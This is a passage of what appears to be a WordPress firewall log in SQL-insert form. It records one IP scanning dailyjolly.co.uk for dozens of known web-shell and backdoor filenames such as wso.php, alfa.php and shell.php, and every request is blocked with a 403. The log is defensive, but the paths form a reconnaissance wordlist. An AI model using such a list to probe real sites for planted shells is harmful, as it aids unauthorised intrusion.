,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/xindex.php','','{\"1\":\"python-requests\\/2.28.2\"}','bai9LA42nQdS0HlOreEx7k3P',0,1674121646.2573,468,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.2\"}','drFm2quMAfaTiOJoCUvjGVSz',0,1674121646.2280,509,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/991176.php','','{\"1\":\"python-requests\\/2.28.2\"}','JHKfYv4qbO9S1ihEeRuLV78T',0,1674121646.2616,551,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wso1.php','','{\"1\":\"python-requests\\/2.28.2\"}','HYLCpoQx6J49FWjEuRtKMrAX',0,1674121646.5279,339,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.28.2\"}','Y5kJ36mtZRNXVwxHG27MiyUE',0,1674121646.3229,577,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"python-requests\\/2.28.2\"}','RH2NrXzpsSL9GJTZQvOVqjYP',0,1674121646.4418,519,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php','','{\"1\":\"python-requests\\/2.28.2\"}','PbLRXglVQ4pH02rxvzNqwe7K',0,1674121646.6216,363,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/hello.php','','{\"1\":\"python-requests\\/2.28.2\"}','x4E1TMdqvIaQFpGwC7OSVWLk',0,1674121646.6342,398,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"python-requests\\/2.28.2\"}','oNHrEyx9eWSMOgJf8AZ5Ljah',0,1674121646.8018,311,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/IXR/hunt.php','','{\"1\":\"python-requests\\/2.28.2\"}','RrpANKX7li3V1WQh0YkCOSay',0,1674121646.8090,317,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php?u','','{\"1\":\"python-requests\\/2.28.2\"}','tXBsQqFbm0g2A7fpZUlwvjWn',0,1674121646.8018,368,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"python-requests\\/2.28.2\"}','QIjLpUS1oDydlROPiYM950u4',0,1674121646.8779,296,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/1975.php','','{\"1\":\"python-requests\\/2.28.2\"}','MpAjsoGEOl8NLxFC0evbUtq9',0,1674121646.8498,324,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.28.2\"}','hRbxz9BUE5ecAX0uLPYyM6fg',0,1674121646.7913,457,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.28.2\"}','kuzUoiamGvnZOgWFE37xwSJ4',0,1674121646.8826,370,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"python-requests\\/2.28.2\"}','OEPfGKMzCTisype6IXdZl2bq',0,1674121646.8737,435,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/style.php','','{\"1\":\"python-requests\\/2.28.2\"}','VxCARuojPEfWbtp6OQFH1Tc5',0,1674121647.2136,245,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/stindex.php','','{\"1\":\"python-requests\\/2.28.2\"}','LMqiWEgT9Km0e4aCcRpvZ61f',0,1674121647.2816,202,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"python-requests\\/2.28.2\"}','yVGbnUEA0mXl2pfQvFKzLDCg',0,1674121647.3387,292,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/8.php','','{\"1\":\"python-requests\\/2.28.2\"}','oaOEHLKBdfUrixw05ysQpA1F',0,1674121647.4803,244,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.28.2\"}','kv3US0IGpwMnE9AgXmaPhWz8',0,1674121647.4800,264,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"python-requests\\/2.28.2\"}','Wm6OvdhPy9xLU8NsjutcQRBH',0,1674121647.4788,275,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/b.php','','{\"1\":\"python-requests\\/2.28.2\"}','q7TnkJZDgIBObRWNMLvKprUE',0,1674121647.5174,257,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/jindex.php','','{\"1\":\"python-requests\\/2.28.2\"}','3wBPLtgaAlO2kT9ihNCeZnpx',0,1674121647.6216,301,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/0.php','','{\"1\":\"python-requests\\/2.28.2\"}','TPo2Az8XtRawBWYIyGrmxJZ4',0,1674121647.6969,226,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/0z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YgDrF7Vn63hjCElbB5xuXA0L',0,1674121654.9154,478,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/fox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tFEazQu4U7qcfrZLbCO1oNhR',0,1674121655.0735,350,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hrNCGtJTWKMaqimAbex0LzPo',0,1674121655.2876,286,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','pmOGEkHJYPZ1aw3qC5SW0oK9',0,1674121655.3175,343,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','bg3f2V41c6OALUHYZurRXvIz',0,1674121655.5221,269,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ff.php?pass=shell','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ICcdFxLrfDiTQsROp0SNBe6u',0,1674121656.5240,189,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PxyrnQMlSeC43iRK6OmNJAIG',0,1674121657.0112,212,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kRe5ATINE26YBHhOG9UCvK70',0,1674121657.6672,262,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/.cgi/cache/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','wNXO69RMiPZGu8Ak3o7pz5FH',0,1674121659.6040,216,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','y9naeT8Y4KwhNgpfimxGZ2MR',0,1674121660.1038,186,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/indeeex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','mQIRjSLOxshZMqf0FvTVo8ey',0,1674121660.1137,182,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','09ot5fwdvghFzq7sLPxSiJmZ',0,1674121660.0927,213,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','FELx86pDmbta2ohSNKve5Tn3',0,1674121660.5439,198,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Nsr0ZxlD1MWLUB3uAJ4kTKF7',0,1674121660.7344,179,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/xindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7GbPrkpYCSZRaBiXIfuwHz6E',0,1674121660.9490,174,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','nT8l5MDSGtRP7WY6ZjB4NgcH',0,1674121660.9998,217,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','07FwoTmQi6MBnyWRs9ELdhUj',0,1674121661.4349,212,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','zBSepfrK2wyTj4sUDRkCWmnA',0,1674121661.8060,250,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','gm07oSj1MQZcRXvGfNl2aDJ3',0,1674121662.5649,179,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hPqZFvnsr9mtIgBUN1eKMiD0',0,1674121662.9099,300,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','vlMpIfQiwCqsTJ6zauZryWE5',0,1674121662.9556,302,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8I6XxmfQp0ZsB7CaqreV3ndc',0,1674121663.0574,321,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','l9w4gaeqKhsjREZYOu1MImfn',0,1674121663.1547,294,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','bGPQhLKS4CARma30VykjpxvJ',0,1674121663.3269,272,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','QVW3UzF5NTCIhs6BvYL7m8rE',0,1674121663.4785,266,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','NKacDI1gyfZrzd3njFutHs0P',0,1674121663.4796,305,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4wjU13pnNYltgxyVfT9L6FQJ',0,1674121663.6468,280,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','JtnKCEUhg4Pkv78Dc5N3ZXzd',0,1674121663.6418,295,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','j7yAEB5ZfpMRm0rnuwHXcOWK',0,1674121663.6721,295,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EeNmcJ4VIoRlptqgbOawT0KL',0,1674121663.6406,337,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0kZCY2Fw37XJdf6QsD1Bl8eM',0,1674121663.6685,319,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eH0Cyocnh1qKSk6dYzRUl9mE',0,1674121663.8211,277,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PNlR18Z3qQSnjes6b9OUFYho',0,1674121663.8443,302,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tTM92nHagIsJfDhCoFPy6Llj',0,1674121663.9275,308,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LudKRjtpeYT8BlXFgCZy5MQG',0,1674121664.1397,305,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/IXR/hunt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PIxsBvrLmH4GQNutkf1FCp5h',0,1674121664.1188,326,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','HK8F7fv1ARQJZ5n92GuxzON4',0,1674121664.4323,250,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','S7vXMIT5cGNdzqhjOkQogD0F',0,1674121664.8583,199,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ijt3w1yRFugNIBHJevYZpVac',0,1674121665.3104,179,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0PvqeElwLau5NZQxh79pRTAF',0,1674121681.0690,415,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','QeFM7ifa52dlEDvKR9H1A3Nb',0,1674121681.0821,823,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','X2iQzSpFsgV6m0JjUPM5CLNW',0,1674121681.3053,699,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','mdqhjDNftbE5MgKxc2okCGQa',0,1674121681.0323,1035,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/plugins/fighter/fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','jXM7FrRd4KSeL0Q6AWpzY1Df',0,1674121681.2200,872,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','6ByqOneZlpIzC2ftKbU085TV',0,1674121681.3429,771,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-includes/css/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Ne29LfoJa7MHrySiTvt5KkGp',0,1674121681.0901,1243,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kthLiWU4HoeI2BlCJxm8nYNK',0,1674121681.2569,1179,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eSf2qhp9u1ZHjdPOLN5bm6Bk',0,1674121681.1838,1257,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','iNva3VXnIsohBzcELQ1Dj7uw',0,1674121681.3882,1177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PY9UMBlIsLynrVZ3XuJ1oWtf',0,1674121681.4897,1235,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-admin/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','n9lRQ41bcpv05mrwNX2J7fWD',0,1674121681.4037,1352,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','nFDRkJCBrjuLEgyMPeibQtIh',0,1674121681.4972,1456,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','na1C5fGNsTeb8xWiDZUu2vQY',0,1674121681.8656,1130,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','IED05diZf7lRncavqjL3OTJz',0,1674121682.0983,1049,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tjlIyoO8ZXaBbH1YR6GSDmhz',0,1674121681.9679,1198,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wso112233.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ARuHjE0MgO9C4FlPGSnbiQBw',0,1674121682.1656,1064,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','NUmCJtp13Aqx0YfuPHV5BSDl',0,1674121682.0411,1190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YDHhm5LpO3KfSNlVZJ1kAzur',0,1674121681.8934,1379,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','l86rJyDLYvVcKPhIfFsNgtmo',0,1674121682.1162,1156,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5ARENUXrOjiY1gPZfoK0L3Jl',0,1674121682.0001,1275,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/mt/pekok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kL8HPlvcZ9eS02tINwBGxioh',0,1674121682.0744,1279,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PQJZVAxMLB9kp24u3SbIsNfG',0,1674121682.0979,1276,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PaBiyAYM6jOdVsD9JClwtIb5',0,1674121682.0449,1329,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5PGfaBhXR0dNx6DMzZkenSWt',0,1674121682.1676,1325,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://dailyjolly.co.uk/xmlrpcs.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 